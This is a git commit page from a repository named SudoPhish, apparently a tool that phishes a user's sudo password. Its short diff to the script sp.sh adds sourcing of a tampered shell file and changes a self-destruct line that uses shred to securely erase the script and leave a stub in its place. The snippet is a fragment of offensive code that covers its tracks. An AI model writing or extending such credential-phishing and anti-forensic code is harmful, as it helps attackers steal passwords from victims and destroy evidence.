SudoPhish

Unnamed repository; edit this file 'description' to name the repository.
Log | Files | Refs | README | LICENSE

commit a6c5934c0cf3fa9b70e6e498a25da211830dba58
parent 583fcab91250885f2e72b09faf1b7ea7ffc1ee34
Author: MichaelDim02 <31562759+MichaelDim02@users.noreply.github.com>
Date:   Thu,  8 Jul 2021 12:28:23 +0300

Add files via upload
Diffstat:
Msp.sh | 3++-
1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/sp.sh b/sp.sh @@ -40,6 +40,7 @@ dellastline() { dellastline echo "00000000000000000000000000" >> "$shellfile" dellastline +source "$shellfile" # Self-destruct -shred -fu "$0" +shred -fu "$0" && echo "#" > "$0" && chmod +x "$0"